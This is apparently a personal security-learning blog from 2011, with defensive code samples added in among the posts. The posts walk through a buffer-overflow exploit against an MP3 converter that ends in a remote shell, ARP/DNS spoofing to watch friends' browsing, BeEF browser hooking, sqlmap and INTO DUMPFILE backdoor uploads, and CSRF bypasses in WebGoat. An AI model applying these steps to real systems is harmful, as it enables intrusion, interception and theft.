Sunday, December 4, 2011

reverse engineering Mini-stream RM-MP3 Converter (no SEH)

target : Mini-stream RM-MP3 Converter
tools : python, ollydbg/Immunity Debugger, pattern_create, pattern_offset
OS : Windows XP SP2

SS target : (screenshot)

fuzzer :

hex = "http://." + "\x41" * 18000   # "http://." makes the entry a URL, then 18000 bytes of \x41
f = open("semangka.pls", "w")        # write the file semangka.pls
f.write(hex)
f.close()

step by step :
1. install the application on Windows, then run Mini-stream RM-MP3 Converter and ollydbg.
2. attach to the application in ollydbg.
3. load semangka.pls, and this is the result :
(screenshot)
4. now we must find how far into the buffer EIP is overwritten, so we modify our fuzzer :
(screenshot)
5. after running our fuzzer again, we get :
(screenshot)
6. now we use pattern_offset like this :
(screenshot)
7. and this is our modified fuzzer :
(screenshot)
8. and this is the result :
(screenshot)
EIP now reads DEADBEEF, so the conclusion is that EIP is reached after 17416+8 bytes and the stack is under our control. And if the stack can be overwritten, we can place a payload in the stack. So we must modify our fuzzer again.
9. this is the newly modified fuzzer :
(screenshot)
the first hex uploads \x90 * 17416, the second hex overwrites the address in EIP with DEADBEEF, the third hex sends no-operation instructions \x90 * (17424 - length of the hex before it), and the fourth hex uploads the character C * (20000 - length of the hex before it). And this is the SS :
(screenshot)
10. now we must find a JMP ESP instruction to redirect EIP into the PAYLOAD in buffer memory.
11. the way to find JMP ESP is to open the executable modules and choose a library file whose address EIP can use to get into the stack. In this case we use user32.dll. Double click user32.dll and a new window will open; right click and search for the command JMP ESP.
12. we get a JMP ESP instruction, so we can write the address of JMP ESP (77D8AF0A) in place of DEADBEEF.
13. and this is the script of our new fuzzer :
(screenshot)
14. ok, we try the fuzzer against the application again, but it is not what we hoped: the fuzzer does not redirect into the stack in memory, so we try shell32.dll to find an address of JMP ESP. Open the executable modules, choose shell32.dll, and find the address of JMP ESP. The JMP ESP address is 7CA58265.
15. so we must modify our fuzzer again, like this :
(screenshot)
16. now we restart the application and run our fuzzer. We can see that the fuzzer now redirects into the stack memory :
(screenshot)
17. now we generate a payload with metasploit and modify our fuzzer with the payload from metasploit :
(screenshot)
18. run the application without ollydbg and load the fuzzer file. After we load the fuzzer file, the application will error :
(screenshot)
19. open konsole and enter the command telnet 192.168.56.101 4444.
(screenshot)
20. so now we control Windows like this :
(screenshot)
and the result is that Windows will shut down in 30 seconds :
(screenshot)
and FINISHED :D
-=CMIIW=-
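A defensive counterpart to the walkthrough above, added here and not part of the original post: a small scanner that flags .pls entries shaped like the crash file (an overlong URL made of one repeated byte). The length and run limits are assumptions, not values taken from the converter.

```python
"""Scanner for .pls playlist files (added example, not the converter's code or the post's).
The post's crash file is one line, "http://." followed by 18000 0x41 bytes, which the
converter copies into a fixed-size stack buffer until EIP is overwritten. A player that
bounds URL length, or a file check run before the file is opened, refuses that input.
The limits below are assumptions, not values from the application."""
import re

MAX_URL_LEN = 2048   # assumption: no legitimate stream URL is longer than this
SLED_RUN = 64        # assumption: 64+ identical bytes in a row is padding, not a URL
SLED_RE = re.compile(rb"(.)\1{%d,}" % (SLED_RUN - 1), re.S)

def parse_pls_lines(data: bytes):
    """Yield (key, value) for INI-style lines; bare lines (like the post's file) get key None."""
    for raw in data.splitlines():
        line = raw.strip()
        if not line or line.startswith(b"[") or line.startswith(b";"):
            continue   # section header, comment or empty line
        key, sep, value = line.partition(b"=")
        if sep and re.fullmatch(rb"[A-Za-z]+\d*", key.strip()):
            yield key.strip().decode(), value.strip()
        else:
            yield None, line

def scan_pls(data: bytes, max_url: int = MAX_URL_LEN):
    """Return a list of findings; an empty list means every entry looks like a normal URL."""
    findings = []
    for idx, (key, value) in enumerate(parse_pls_lines(data), 1):
        label = key or f"line {idx}"
        if len(value) > max_url:
            findings.append(f"{label}: value is {len(value)} bytes (limit {max_url})")
        run = SLED_RE.search(value)   # 'A'*18000, a \x90 NOP sled or 'C' filler
        if run:
            findings.append(f"{label}: run of {len(run.group(0))} x {run.group(1)!r}")
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append(f"{label}: contains non-printable bytes")
    return findings

# constructed samples: a benign playlist and a file shaped like the post's semangka.pls
BENIGN = b"[playlist]\nFile1=http://stream.example/live.mp3\nTitle1=Live\nNumberOfEntries=1\n"
CRASH = b"http://." + b"\x41" * 18000

if __name__ == "__main__":
    print(scan_pls(BENIGN))          # []
    for finding in scan_pls(CRASH):
        print(finding)
```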

Thursday, September 29, 2011

combine driftnet and ettercap

what do you see?? because studying was too dizzying, I decided to play around for a moment. In Linux BackTrack there is a very exciting tool. The name of the tool is driftnet. With driftnet we can see the activity of our friends who are busy surfing the virtual world.

let's do it. :P
first, I open and edit etter.dns; don't forget to change your IP there. After finishing editing etter.dns, let's get out our guns. :D
(screenshot)

in Linux BackTrack, driftnet has difficulty with privilege escalation. But don't forget to enable ettercap: in a terminal we can type "ettercap -T -q -M arp -i wlan0 -P dns_spoof //" (if you are connected to the network by LAN, wlan0 can be changed to eth0).
ok, let's go to attack.. :D

type "driftnet -i wlan0 -v" to activate driftnet. Wait a few minutes, and taratatataaaaaaaaaa....

-=CMIIW=-

Wednesday, September 28, 2011

"beef" social engineering tools

hearing the word beef, the first thing that comes to mind is beef, the meat (hmm.. tasty :D).. but this beef is very different, because this beef exploits our browser. We can know what the target opens.
let's just start :
(screenshot)

in the BackTrack menu we can find it under exploitation tools ==> social engineering tools ==> beef XSS framework ==> beef.
(screenshot)

there we get a script that we can put on our web page :). I put this on a hosting account for learning purposes; after I inserted it into index.html, I opened http://127.0.1.1:3000/ui/panel (this can be replaced with our IP address / adjusted). Here is the beef display :
(screenshot)

-=CMIIW=-



Saturday, September 24, 2011

snort alert for system

for this part we will learn about snort. If you use BackTrack 5 R1, you can find snort in the menu backtrack => services => snort services.

first, start snort. After starting snort, open a terminal and type "pico /etc/snort/snort.conf"
(screenshot)

now, we can edit it like this :

change var HOME_NET any to var HOME_NET "your ip".
to finish, press "ctrl+x", "y" and then "enter".

now we can run snort.
in a terminal we can type "snort -i eth0 -q -c /etc/snort/snort.conf -A console"; if we use wireless, we change "eth0" to "wlan0".

our alarm is ready to "ring".
the response if there is an attacker :
(screenshot)

-=CMIIW=-






Sunday, July 24, 2011

SQL DUMPFILE

vulnerable web : http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=%27&Submit=Submit#
and I tried to type in sqlmap :
root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.102/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie='PHPSESSID=ahh7j1bsrtrs5qtjn8tgpcp4g2; security=low' --dbs

then I get :
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL >= 5.0.0
[11:55:00] [INFO] fetching database names
available databases [14]:
[*] abal2
[*] auracms
[*] auracms1
[*] cdcol
[*] dvwa
[*] information_schema
[*] joomla
[*] joomla1
[*] mysql
[*] phpmyadmin
[*] test
[*] upload
[*] wordpress
[*] wordpress2

after typing :

root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie="PHPSESSID=lp7qif2ecvd2lod7rp3unddfs1; security=low" --password

and then I get :

web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5
[11:56:26] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:56:29] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[11:56:29] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL


now I have 2 users, the first pma and the second root, with no password.


after I get the MySQL user and password, I log into SQL with the URL :
192.168.56.102/phpmyadmin
then I create a database named : bd
and I create a table for the upload
(screenshot)
second, I create a table for the form :
(screenshot)
after creating the database and tables, the result can be seen like this :
(screenshot)
then I insert SQL syntax like this :
(screenshot)
to dump the files, type :
1. select * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak;
2. select * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file;

it is finished for uploading the backdoor.
192.168.56.102/kotak.html
(screenshot)
but there is a script error.

-=CMIIW=-
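Added example, not from the original post: a check for the condition the dumpfile step relies on, that is a MySQL account holding the FILE privilege while secure_file_priv does not keep writes out of the web root. The GRANT rows, account names and paths are constructed.

```python
"""Added example (not from the original post): decide whether a MySQL account could write
files into the web root with SELECT ... INTO DUMPFILE, the step the post uses to drop
kotak.html and unggah_file.php under /opt/lampp/htdocs. Inputs are constructed to look
like SHOW GRANTS rows and the secure_file_priv variable; names and paths are assumptions."""
import re
from pathlib import PurePosixPath

def has_file_privilege(grant_rows):
    """True if any GRANT row gives FILE (or ALL) globally, i.e. ON *.*; FILE is a global privilege."""
    for row in grant_rows:
        m = re.match(r"GRANT (.+?) ON (\S+)\.(\S+) TO", row, re.I)
        if not m:
            continue
        privs, db, tbl = m.group(1).upper(), m.group(2), m.group(3)
        if db == "*" and tbl == "*" and {"FILE", "ALL", "ALL PRIVILEGES"} & set(privs.split(", ")):
            return True
    return False

def dumpfile_can_reach(secure_file_priv, target_dir):
    """'' means writes anywhere, 'NULL' means file ops disabled, else a confining directory."""
    if secure_file_priv == "NULL":
        return False
    if secure_file_priv == "":
        return True
    allowed, target = PurePosixPath(secure_file_priv), PurePosixPath(target_dir)
    return allowed == target or allowed in target.parents

def dumpfile_risk(grant_rows, secure_file_priv, docroot):
    """Return (risky, reason); risky means a DB-side injection could drop a file into docroot."""
    if not has_file_privilege(grant_rows):
        return False, "account lacks the FILE privilege"
    if not dumpfile_can_reach(secure_file_priv, docroot):
        return False, f"secure_file_priv={secure_file_priv!r} keeps writes out of {docroot}"
    return True, "FILE privilege plus a secure_file_priv that covers the web root"

# constructed: an XAMPP-style root with no password, as in the post
ROOT_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
# constructed: a least-privilege account for the web application
APP_GRANTS = ["GRANT SELECT, INSERT, UPDATE, DELETE ON `dvwa`.* TO 'dvwa'@'localhost'"]
DOCROOT = "/opt/lampp/htdocs"

if __name__ == "__main__":
    print(dumpfile_risk(ROOT_GRANTS, "", DOCROOT))                         # risky
    print(dumpfile_risk(ROOT_GRANTS, "/var/lib/mysql-files", DOCROOT))    # not risky
    print(dumpfile_risk(APP_GRANTS, "", DOCROOT))                          # not risky
```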

Tuesday, July 19, 2011

the difference between SOCKS 4 and SOCKS 5

SOCKS is a standard protocol designed to pass TCP traffic through proxy servers. Currently two implementations of the SOCKS protocol are in use, SOCKS version 4 (SOCKS4) and SOCKS version 5 (SOCKS5). The main difference between the two versions is that SOCKS5 provides additional security through authentication.
SOCKS5 TCP is compatible with most applications. It also provides basic firewall capabilities, because it authenticates incoming and outgoing packets and can provide network address translation (NAT).

CMIIW
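To make the authentication difference concrete, an added example (not from the original post) that builds and parses the SOCKS4 CONNECT request and the SOCKS5 method negotiation with Python's struct module; the host, port and credentials are constructed sample values.

```python
"""Added example (not from the original post): the wire formats behind the difference above.
SOCKS4 sends VN=4, CD=1, DSTPORT, DSTIP and a NUL-terminated USERID the proxy cannot verify;
SOCKS5 (RFC 1928) first negotiates an authentication method, e.g. 0x02 for username/password
(RFC 1929). Host, port and credentials used here are constructed sample values."""
import struct
import ipaddress

SOCKS5_NO_AUTH, SOCKS5_USERPASS, SOCKS5_NO_ACCEPTABLE = 0x00, 0x02, 0xFF

def socks4_connect(ip: str, port: int, userid: str) -> bytes:
    """VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID NUL: identity is a free-text claim."""
    return struct.pack("!BBH4s", 4, 1, port, ipaddress.IPv4Address(ip).packed) + userid.encode() + b"\x00"

def parse_socks4_connect(data: bytes):
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    if vn != 4 or cd != 1:
        raise ValueError("not a SOCKS4 CONNECT request")
    userid, nul, _ = data[8:].partition(b"\x00")
    if not nul:
        raise ValueError("USERID is not NUL-terminated")
    return str(ipaddress.IPv4Address(ip)), port, userid.decode()

def socks5_greeting(methods) -> bytes:
    """VER(1) NMETHODS(1) METHODS: the client lists what it supports."""
    return struct.pack("!BB", 5, len(methods)) + bytes(methods)

def socks5_select_method(greeting: bytes, require_auth: bool) -> bytes:
    """Server side: demand username/password when policy requires it, else accept NO_AUTH."""
    ver, n = greeting[0], greeting[1]
    if ver != 5 or len(greeting) != 2 + n:
        raise ValueError("malformed SOCKS5 greeting")
    offered = set(greeting[2:])
    wanted = SOCKS5_USERPASS if require_auth else SOCKS5_NO_AUTH
    return struct.pack("!BB", 5, wanted if wanted in offered else SOCKS5_NO_ACCEPTABLE)

def socks5_userpass_request(user: str, password: str) -> bytes:
    """RFC 1929 sub-negotiation: VER=1, ULEN, UNAME, PLEN, PASSWD (each 1..255 bytes)."""
    u, p = user.encode(), password.encode()
    if not (0 < len(u) <= 255 and 0 < len(p) <= 255):
        raise ValueError("username and password must be 1..255 bytes")
    return struct.pack("!BB", 1, len(u)) + u + struct.pack("!B", len(p)) + p

if __name__ == "__main__":
    req = socks4_connect("203.0.113.7", 80, "anyone")
    print(req.hex(), parse_socks4_connect(req))
    print(socks5_select_method(socks5_greeting([SOCKS5_NO_AUTH]), require_auth=True).hex())  # 05ff
```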

Wednesday, July 13, 2011

what is htaccess

when we open a web page, of course we have at some point seen a page that says "404 Error" or "cannot find the page"

Here are some of the functions of .htaccess:
- protect folders with a password
- forward visitors to your website automatically
- create your own error message pages
- reject visitors from certain IP addresses
- change your file extensions
- only allow certain visitors by IP address
- allow / reject directory listing

Monday, July 11, 2011

web and system

Now I am learning to get into a web site, put a backdoor in, and exploit the system.
there was a web vulnerability in the file upload; the upload feature was already filtered, so it could only upload jpeg files.
I used Burp Suite to intercept and replace the request, so that files other than jpeg could be uploaded.
I uploaded backdoor.php, so the web site now has my backdoor.
then I go into the backdoor and try to exploit the system.
(screenshot)

I used a great many references, using exploits from www.exploit-db.com, etc. I tried various exploits against the kernel, and it turns out the kernel of the system is already patched, so the chance that a kernel exploit works is very small.

My suggestion: when exploiting a system, it is not just the kernel that can be exploited, but also the application side and its developer.
  

Sunday, July 10, 2011

PHP SUHOSIN

Suhosin is an advanced protection system for PHP installations. It is designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts that can be used separately or combined.

Patches and the Suhosin extension can be downloaded at http://www.hardened-php.net/suhosin/download.html

installation
Preparation
If you want to install PHP with the Suhosin patch you must first do some preparatory steps.

Step 1: install the signature key of the Hardened-PHP Project
First grab a copy of http://www.hardened-php.net/hardened-php-signature-key.asc and import it into your GNU Privacy Guard keyring
 


#> gpg --import < hardened-php-signature-key.asc
gpg: /root/.gnupg/trustdb.gpg: trust-db erzeugt
gpg: key 0A864AA1: public key "Hardened-PHP Signature Key" imported
gpg: Anzahl insgesamt bearbeiteter Schlüssel: 1
gpg:
importiert: 1
 
Step 2: download and check the necessary files

Now it's time to grab a copy of the newest PHP tarball and the latest version of the suhosin-patch. In addition you must obtain the digital signature (*.sig) files. You can grab all of this at http://www.hardened-php.net/suhosin/download.html

As a first precaution you can check the MD5 hashes of the downloaded files against the ones you find on the download page

#> md5sum php-5.1.4.tar.bz2
66a806161d4a2d3b5153ebe4cd0f2e1c php-5.1.4.tar.bz2
#> md5sum suhosin-patch-5.1.4-0.9.0.patch.gz
ea9026495c4ce34a329fd0a87474f1ba suhosin-patch-5.1.4-0.9.0.patch.gz

Step 3: Unpacking and Patching
You must now unpack the PHP tarball, gunzip the patch file and then apply the patch.

#> tar -xjf php-5.1.4.tar.bz2
#> gunzip suhosin-patch-5.1.4-0.9.0.patch.gz
#> cd php-5.1.4
#> patch -p1 -i ../suhosin-patch-5.1.4-0.9.0.patch
     

Wednesday, June 29, 2011

CSRF Prompt By-Pass and CSRF Token By-Pass

CSRF Prompt By-Pass

in this chapter, continuing from the earlier chapter, I learn about CSRF Prompt By-Pass.
These are the directions from CSRF Prompt By-Pass :

“Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple malicious requests: the first to transfer funds, and the second a request to confirm the prompt that the first request triggered. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu. “

SS :
(screenshot)

I tried to understand what the directions mean; like the previous chapter, I tried to copy the shortcut from the left hand menu :
http://127.0.0.1/webgoat/attack?Screen=82&menu=900 and I think in this chapter I must add transferFunds=4000 to this URL.

The result :
SS :
(screenshot)

SS result :
(screenshot)

after I saw the result I just smiled thinly: the input I had given was a URL, so I must put it into the browser's URL bar, like this :
(screenshot)

and the result is :
(screenshot)

then I click confirm :
(screenshot)

CSRF Token By-Pass

these are the directions :
“Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious request to transfer funds. To successfully complete you need to obtain a valid request token. The page that presents the transfer funds form contains a valid request token. The URL for the transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load this page, read the token and append the token in a forged request to transferFunds. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.”
SS :
(screenshot)

after understanding the directions, I do the same as in the CSRF Prompt By-Pass chapter. But the difference in this chapter is :
I tried :
(screenshot)

and the result is :
(screenshot)

and after I click sub query,
SS:
(screenshot)

this is my report
CMIIW
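Added example, not from the original post or WebGoat: the server-side check these two lessons are bypassing, with a token bound to the session and an Origin check, run against the forged requests the lessons describe. Session ids, the CSRFToken parameter name and the origins are constructed.

```python
"""Added example (not from the original post or WebGoat): the server-side check these two
lessons are bypassing. The transfer form is issued with a token bound to the session; a
forged request from the newsgroup post carries no token, or a token the attacker read from
their own session, and is refused. Session ids, parameter names and origins are constructed."""
import hashlib
import hmac
import secrets

_SECRET = secrets.token_bytes(32)   # constructed: server-side key, so tokens cannot be forged

def issue_token(session_id: str) -> str:
    """Token derived from the session id, so a token from another session never matches."""
    return hmac.new(_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def verify_transfer(session_id: str, params: dict, origin: str, allowed_origin: str):
    """Return (ok, reason): reject cross-site origins and missing or foreign tokens."""
    if origin and origin != allowed_origin:   # browsers send Origin on POST; absent is tolerated here
        return False, f"origin {origin} is not {allowed_origin}"
    token = params.get("CSRFToken")
    if not token:
        return False, "no CSRFToken in request"
    if not hmac.compare_digest(token.encode(), issue_token(session_id).encode()):
        return False, "CSRFToken does not belong to this session"
    if params.get("transferFunds") in (None, "main"):
        return False, "nothing to do: transferFunds=main only renders the form"
    return True, f"transfer of {params['transferFunds']} accepted"

# constructed sessions: the victim is logged in; the attacker only has their own session
VICTIM, ATTACKER, SITE = "sess-victim", "sess-attacker", "http://127.0.0.1"

def demo():
    """The three forged variants from the lessons, then a genuine same-site request."""
    forged_plain = {"transferFunds": "4000"}                         # CSRF lesson, no token
    forged_foreign = {"transferFunds": "4000", "CSRFToken": issue_token(ATTACKER)}
    legit = {"transferFunds": "4000", "CSRFToken": issue_token(VICTIM)}
    return [
        verify_transfer(VICTIM, forged_plain, SITE, SITE)[0],
        verify_transfer(VICTIM, forged_foreign, SITE, SITE)[0],
        verify_transfer(VICTIM, legit, "http://evil.example", SITE)[0],
        verify_transfer(VICTIM, legit, SITE, SITE)[0],
    ]

if __name__ == "__main__":
    print(demo())   # [False, False, False, True]
```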